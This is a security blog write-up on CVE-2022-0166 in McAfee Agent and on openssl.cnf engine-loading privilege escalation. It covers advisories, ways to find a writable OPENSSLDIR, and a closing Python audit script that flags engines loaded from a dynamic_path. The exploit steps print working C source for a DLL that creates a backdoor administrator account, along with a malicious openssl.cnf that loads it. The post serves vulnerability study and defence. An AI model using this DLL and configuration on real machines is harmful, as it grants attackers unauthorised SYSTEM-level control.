Learning openssl.cnf exploitation techniques from the CVE-2022-0166 McAfee Agent privilege escalation

2022-01-27 09:49:19 Steven Xeldax

## Background

A piece of news recently caught my attention: McAfee Agent has a privilege escalation vulnerability.

![](/download/f599dbf4-978c-4e45-9f2f-30d4eb41b1a2.png)

Searching Google and Twitter, however, only turned up a few fragments about it.

https://kc.mcafee.com/corporate/index?page=content&id=SB10378

```
A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5 affecting all supported operating systems. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory. A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file.
```

![](/download/f3c01d52-6bfe-4239-9c84-eba5cfc45d7a.png)

https://www.tenable.com/plugins/nessus/157126

```
- A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory. A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file. (CVE-2022-0166)

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.
```

From these descriptions, this is not a binary (memory corruption) vulnerability; the cause appears to be that an attacker can control the contents of openssl.cnf and modify its configuration to escalate privileges.

Beyond that, no further useful information was available, and no PoC for the vulnerability could be found on GitHub either.

## Historical problems with openssl.cnf

Problems involving openssl.cnf are nothing new. The earlier local privilege escalation vulnerabilities in Acronis Cyber Backup and Cyber Protect were openssl.cnf related, and even curl and OpenSSL itself have been affected by openssl.cnf issues.

> https://venusense.com/new_type/aqtg/20201013/21871.html

![](/download/e8b2c8bf-44f6-42f6-b899-4e0caf88ad6c.png)

> https://hackerone.com/reports/608577

![](/download/bd0a7cc0-c062-4555-86c9-cdde81f4095d.png)

CVE-2019-12572, "PIA Windows Privilege Escalation: Malicious OpenSSL Engine", was likewise caused by being able to modify the openssl.cnf file.

![](/download/b4ce6182-f996-4d11-a200-e67c327c05f0.png)

## Exploiting a malicious openssl.cnf

### Static analysis of openssl.cnf

The file that consumes openssl.cnf is usually libeay32.dll, so we can search the whole system for libeay32.dll files.

![](/download/ddcd4cd3-6d71-4cd4-8e65-97c0f350373c.png)

This is one way to find potentially affected DLLs and the software they belong to.

### Dynamic analysis of openssl.cnf

Another approach is to use Procmon, filter its log for accesses to openssl.cnf, and analyse the results.

### Exploitation

Step one: find a writable OPENSSLDIR. We can use this tool to analyse libeay32.dll:

https://github.com/mirchr/openssldir_check

![](/download/d3b400fd-17d2-42be-8249-cbe133bd44db.png)

If the OPENSSLDIR it reports is writable by us, we can proceed to the next step and create the openssl.cnf file there.

Step two: create a malicious DLL.

```
/* Cross compile with: x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared */
#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        /* Runs in the context of whatever process loads the engine DLL. */
        system("cmd /c net user woot insertpasswordhere /add");
        system("cmd /c net localgroup administrators woot /add");
        break;
    case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
        break;
    case DLL_THREAD_DETACH:
        // Do thread-specific cleanup.
        break;
    case DLL_PROCESS_DETACH:
        // Perform any necessary cleanup.
        break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}
```

Step three: modify openssl.cnf.

```
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
```

Final step: restart the program that loads libeay32.dll. It reads openssl.cnf, loads the malicious DLL and executes its code.

## A real-world openssl.cnf case

We found that the openssl executable bundled with cmder

![](/download/fefd0410-4c29-4bfd-871f-5372acd4683a.png)

uses the configuration file C:\Program Files\Git\mingw64\ssl\openssl.cnf

![](/download/93fd77c4-b32e-4a97-9305-75f14855a5a5.png)

We modified this cnf file to point at a malicious DLL (one that pops the calculator):

```
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = d:\\Temp\\woot\\woot.dll
init = 0
```

![](/download/b614f865-9c35-4715-b2a5-ea58b3d345dd.png)

Running openssl again, we saw that it successfully loaded the DLL and launched the calculator.

![](/download/1154cb9b-5b76-4b54-bf10-57ba8b05c4c9.png)

![](/download/26247abc-bc63-4993-89dd-94848d7ecdfa.png)

## About CVE-2022-0166

The libeay32.dll involved in CVE-2022-0166 was compiled by McAfee themselves; its location is shown below:

![](/download/226c5eea-a16e-4f88-be50-cc626b91a79d.png)

Using openssldir_check or IDA, the OPENSSLDIR can be found:

```
D:\BUILD_1052945\BUILD\matools\build\msvc\ma_tools_outdir\openssl\ssl
```

![](/download/c960fdb2-c291-47fb-bce4-8d93945e84d9.png)

Then create the openssl.cnf file at that path and plant the malicious configuration and DLL.

![](/download/6085974b-acda-4e2f-9c15-42126079ddf5.png)
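As an added defender-side example (not code from this post, McAfee or OpenSSL), the following Python audit parses an openssl.cnf and follows the same openssl_conf, engines, engine-section chain that the exploitation steps and the CVE-2022-0166 case above rely on, reporting every engine that would pull a shared library into the process through dynamic_path. Both sample configurations are constructed; the parser is a minimal one written for this example and handles only the key/value and section syntax shown on this page.

```python
from pathlib import PureWindowsPath

# Constructed sample mirroring the malicious configuration shown in the post.
MALICIOUS_CNF = r"""
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
"""

BENIGN_CNF = "openssl_conf = openssl_init\n[openssl_init]\nssl_conf = ssl_sect\n"  # constructed: no engine

def parse_openssl_cnf(text):
    """Minimal openssl.cnf parser; section '' holds keys before the first [header]."""
    sections, current = {"": {}}, ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and whitespace
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            sections[current][key] = value.replace("\\\\", "\\")   # OpenSSL writes \ as \\
    return sections

def find_dynamic_engines(sections):
    """Follow openssl_conf -> engines -> engine sections; return (engine_id, dll_path)."""
    init_name = sections[""].get("openssl_conf")
    engines_name = sections.get(init_name, {}).get("engines")
    if engines_name is None:
        return []
    found = []
    for name, sect_name in sections.get(engines_name, {}).items():
        engine = sections.get(sect_name, {})
        if "dynamic_path" in engine:                  # a DLL will be loaded into the process
            found.append((engine.get("engine_id", name), engine["dynamic_path"]))
    return found

def audit(text):
    """One human-readable finding per dynamically loaded engine; an empty list is clean."""
    return [f"engine '{eid}' loads {PureWindowsPath(dll)}"
            for eid, dll in find_dynamic_engines(parse_openssl_cnf(text))]
```

Run `audit()` over every openssl.cnf found under the OPENSSLDIR paths reported by openssldir_check; any non-empty result on a host where no engine is expected warrants investigation of the file's owner and the directory's ACL.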